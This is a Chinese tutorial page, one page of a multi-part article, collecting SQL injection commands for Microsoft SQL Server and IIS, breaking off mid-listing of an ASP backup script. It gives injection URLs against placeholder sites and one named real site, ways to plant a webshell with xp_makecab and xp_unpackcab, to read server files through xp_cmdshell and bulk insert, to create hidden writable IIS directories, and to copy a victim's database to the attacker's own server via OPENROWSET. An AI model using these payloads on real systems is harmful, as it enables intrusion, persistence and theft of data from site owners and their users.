转至繁体中文版     | 网站首页 | 图文教程 | 资源下载 | 站长博客 | 图片素材 | 武汉seo | 武汉网站优化 | 
最新公告:     敏韬网|教学资源学习资料永久免费分享站!  [mintao  2008年9月2日]        
您现在的位置: 学习笔记 >> 图文教程 >> 数据库 >> Sql Server >> 正文
最详细的SQL注入相关的命令整理         

最详细的SQL注入相关的命令整理

作者:闵涛 文章来源:闵涛的学习笔记 点击数:4760 更新时间:2007/11/14 13:12:59
25、手工建立IIS隐藏目录的方法:
?   查看本地虚拟目录列表:cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
?   新建一个kiss目录:mkdir c:\asp\kiss
?   建立kiss虚拟目录:cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"  
?   为kiss目录加执行和写权限:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
?   ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
?   访问:http://127.0.0.1/kiss/test.asp

26、使用openrowset()连回本地做测试:
SELECT a.*
FROM OPENROWSET(''''SQLOLEDB'''',''''127.0.0.1'''';''''sa'''';''''111111'''',
''''SELECT * FROM [dvbbs].[dbo].[dv_admin]'''') AS a

SELECT * FROM OPENROWSET(''''SQLOLEDB'''',''''127.0.0.1'''';''''sa'''';''''111111'''',
''''SELECT * FROM [dvbbs].[dbo].[dv_admin]'''')

27、获得主机名:
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername

28、获得数据库用户名:
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user

29、普通用户获得WEBSHELL的方法之二:
?   打包:
EXEC [master].[dbo].[xp_makecab] ''''c:\test.rar'''',''''default'''',1,''''d:\cmd.asp''''
解包,可以用于得到webshell:
?   EXEC [master].[dbo].[xp_unpackcab] ''''C:\test.rar'''',''''c:'''',1, ''''n.asp''''
?   读任意文件内容,要求有master的dbo权限:
EXEC [master].[dbo].[xp_readerrorlog] 1,''''c:\cmd.asp''''

30、sa 权限下已知web路径直接备份数据库到web路径下

http://www.XXXX.com/FullStory.asp?id=1;backuup database 数据库名 to disk=''''c:\inetpub\wwwroot\save.db'''' 则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。

?   遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:temp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
?    接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
?   我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs ''''c:\'''';--
?   我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree ''''c:\'''';-- 这样就可以成功的浏览到所有的目录(文件夹)列表
?   如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insert into temp(id) exec master.dbo.xp_cmdshell ''''type c:\web\index.asp'''';--
?   使用''''bulk insert''''语法可以将一个文本文件插入到一个临时表中。如:bulk insert temp(id) from ''''c:\inetpub\wwwroot\index.asp''''   浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。

31、一些sql中的扩展存储的总结:
xp_availablemedia 显示系统上可用的盘符''''C:\'''' xp_availablemedia
xp_enumgroups 列出当前系统的使用群组及其说明 xp_enumgroups
xp_enumdsn 列出系统上已经设置好的ODBC数据源名称 xp_enumdsn
xp_dirtree 显示某个目录下的子目录与文件架构 xp_dirtree ''''C:\inetpub\wwwroot\''''
xp_getfiledetails 获取某文件的相关属性 xp_getfiledetails ''''C:\inetpub\wwwroot.asp''''
dbp.xp_makecab 将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开 dbp.xp_makecab ''''C:\lin.cab'''',''''evil'''',1,''''C:\inetpub\mdb.asp''''
xp_unpackcab 解压缩 xp_unpackcab ''''C:\hackway.cab'''',''''C:\temp'''',1
xp_ntsec_enumdomains 列出服务器域名 xp_ntsec_enumdomains
xp_servicecontrol 停止或者启动某个服务 xp_servicecontrol ''''stop'''',''''schedule''''
xp_terminate_process 用pid来停止某个执行中的程序 xp_terminate_process 123
dbo.xp_subdirs 只列某个目录下的子目录 dbo.xp_subdirs ''''C:\''''

32、
USE MASTER
GO
CREATE proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N''''?'''',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won''''t replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then ''''IsUserTable''''
when 2 then ''''IsView''''
when 3 then ''''IsTrigger''''
when 4 then ''''IsProcedure''''
when 5 then ''''IsDefault''''
when 6 then ''''IsForeignKey''''
when 7 then ''''IsScalarFunction''''
when 8 then ''''IsInlineFunction''''
when 9 then ''''IsPrimaryKey''''
when 10 then ''''IsExtendedProc''''
when 11 then ''''IsReplProc''''
when 12 then ''''IsRule''''
    end
/* Create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N''''declare hCForEach cursor global for select ''''''''['''''''' + REPLACE(user_name(uid), N'''''''']'''''''', N'''''''']]'''''''') + '''''''']'''''''' + ''''''''.'''''''' + ''''''''['''''''' +
REPLACE(object_name(id), N'''''''']'''''''', N'''''''']]'''''''') + '''''''']'''''''' from dbo.sysobjects o ''''
+ N'''' where OBJECTPROPERTY(o.id, N''''''''''''+@isobject+'''''''''''') = 1 ''''+N'''' and o.category & '''' + @mscat + N'''' = 0 ''''
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
    exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
    exec(@postcommand)
return @retval
GO


/*
1。获得所有的存储过程的脚本:
EXEc sp_MSforeachObject @command1="sp_helptext ''''?'''' ",@objectType=4
2。获得所有的视图的脚本:
EXEc sp_MSforeachObject @command1="sp_helptext ''''?'''' ",@objectType=2

EXEc sp_MSforeachObject @command1="sp_changeobjectowner ''''?'''', ''''dbo''''",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner ''''?'''', ''''dbo''''",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner ''''?'''', ''''dbo''''",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner ''''?'''', ''''dbo''''",@objectType=4
*/

33、DB_OWNER权限下的数据库备份方法
用openrowset吧。反连到自己的数据库机器,~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的SQL数据库,在查询分析那里执行
insert into OPENROWSET (''''sqloledb'''',''''server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname;'''',''''select * from 你建立的表) select * from 对方的表—
要是数据量太大的话就看看他数据库里有没有自动编号的字段.select * from 表名 where id>100
这样来弄吧
要是和WEB同台的话,直接将库BAK到WEB目录下回来就OK啦。。。不过前提库不能太大,超过2G的话SQL就超时了
如果是SA权限可以利用下面的两个ASP程序来备份数据库:

sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 数据库的备份与恢复</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
选择操作:<INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>备份</label> 
<INPUT TYPE="radio" NAME="ac

上一页  [1] [2] [3] [4] [5] [6]  下一页


[办公软件]在sybase中插入图片、PDF、文本文件  [办公软件]安装Sybase ASE
[办公软件]linux指令大全(完整篇)  [办公软件]Linux新手入门常用命令大全
[办公软件]在RedHat Linux 9里安装gaim0.80  [办公软件]浅谈Linux 下Java 1.5 汉字方块问题解决方法
[办公软件]Linux程序员必读:中文化与GB18030标准  [办公软件]linux指令大全
[办公软件]制作Linux启动盘的四种方法  [办公软件]Linux文件系统的反删除方法
教程录入:mintao    责任编辑:mintao 
  • 上一篇教程:

  • 下一篇教程:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      注:本站部分文章源于互联网,版权归原作者所有!如有侵权,请原作者与本站联系,本站将立即删除! 本站文章除特别注明外均可转载,但需注明出处! [MinTao学以致用网]
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    同类栏目
    · Sql Server  · MySql
    · Access  · ORACLE
    · SyBase  · 其他
    更多内容
    热门推荐 更多内容
  • 没有教程
    		•
    赞助链接
    更多内容
    闵涛博文 更多关于武汉SEO的内容
    500 - 内部服务器错误。

    500 - 内部服务器错误。

    您查找的资源存在问题,因而无法显示。
    | 设为首页 |加入收藏 | 联系站长 | 友情链接 | 版权申明 | 广告服务
    MinTao学以致用网

    Copyright @ 2007-2012 敏韬网(敏而好学,文韬武略--MinTao.Net)(学习笔记) Inc All Rights Reserved.
    闵涛 投放广告、内容合作请Q我! E_mail:admin@mintao.net(欢迎提供学习资源)

    站长:MinTao ICP备案号:鄂ICP备11006601号-18

    闵涛站盟:医药大全-武穴网A打造BCD……
    		咸宁网络警察报警平台